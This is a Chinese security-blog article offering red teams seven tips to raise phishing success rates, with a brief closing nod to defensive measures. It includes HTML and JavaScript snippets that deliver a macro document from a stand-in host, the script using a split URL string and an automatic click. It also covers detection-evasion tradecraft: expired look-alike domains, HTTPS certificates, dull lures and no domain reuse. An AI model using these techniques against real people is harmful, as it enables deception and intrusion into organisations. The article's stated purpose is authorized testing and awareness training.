提升钓鱼成功率看这七点建议

在红蓝对抗当中，钓鱼攻击被越来越多的红队使用，因为员工的安全意识薄弱，导致钓鱼成功的可能性很大，因为钓鱼事件导致内网被入侵的事件比比皆是，作为红队的一员做钓鱼测试的时候，如何提升钓鱼成功率，可以看看以下七点建议。

1、不直接将 payload 放置邮件内容

可以将 payload 放在自己的服务器上，通过访问服务器的方式加载 payload 

使用的钓鱼 url 最好做一下 url 重写，例如使用： 

https://phishy.domain/company/code/a2ef362e-45d0-b21d-5abf-edce29d365cb/)

而不是： 

https://phishy.domain/company/index.php

可以用下面的方式配置 apache 的 url 重写： 

RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php [L,QSA]

2、不直接在邮件内容中添加恶意附件

可以通过嵌入 html、js 等方式进行恶意文件加载，html 方式如：

<a href="https://phishy.domain/payload.docm">
download the code of conduct
</a>

javascript 的方式如：

<a id="download" href="#">
download the code of conduct
</a>
<script>
document.getElementById("download").onclick = function() {
document.location = "https://phish" + "y.domain/pay" + "load.docm"; };
document.getElementById("download").click();
</script>

3、钓鱼域名使用过期域名

申请的域名最怕的是已经被安全产品标记为恶意，所以在申请域名的时候，可以去找一些刚过期的域名，为了迷惑对手，可以尝试根据关键词来搜索过期域名，然后进行注册，提升钓鱼的成功率，下面的网站是可以查询过期域名的：

https://www.expireddomains.net/backorder-expired-domains/

如下工具可以直接输入关键词就可以获得一些相似的过期域名信息，项目地址：

https://github.com/Mr-Un1k0d3r/CatMyPhish

4、搭建钓鱼网站尽量使用 https

因为浏览器会将使用 http 的网站标记为不安全，我们可以申请一些免费的 https 证书，给自己的钓鱼网站添加正常的证书，更具有迷惑性。

5、钓鱼内容尽量无趣

在企业内部经常会收到一些规章制度的邮件、或者内部发布的一些无聊且需要执行的邮件内容，大家在看到邮件内容的时候，不会过多的关注，可能默默的就完成了提示的操作，这样可以减少大家互相讨论导致的钓鱼行为被暴露的风险。

6、尽可能使用第三方的子域名

如果有正常网站的子域名可以用，尽量使用，因为这类域名通常不会被安全软件标记为恶意域名，在大众的心理也会比较信任，比如那些提供二级或者三级域名使用的云服务。

7、每次使用的域名尽量不复用

在被安全公司分析出域名存在恶意行为之后，会被标记并加入威胁情报当中，如果复用该域名，很有可能被安全软件命中威胁情报，从而提前暴露钓鱼行为，导致钓鱼测试失败。

总结

以上是作为攻击方需要注意的几点，而作为防守方，需要做的事情更多，比如提升全民安全意识、邮件安全网关、网络层入侵检测、主机层入侵检测、终端安全等，每个环节都需要进行重点防御。

对于员工安全意识提升方面，以攻促防，通过多次实际的钓鱼模拟测试来提升员工对钓鱼邮件的免疫能力，这是一个艰难而又漫长的过程

文由信安之路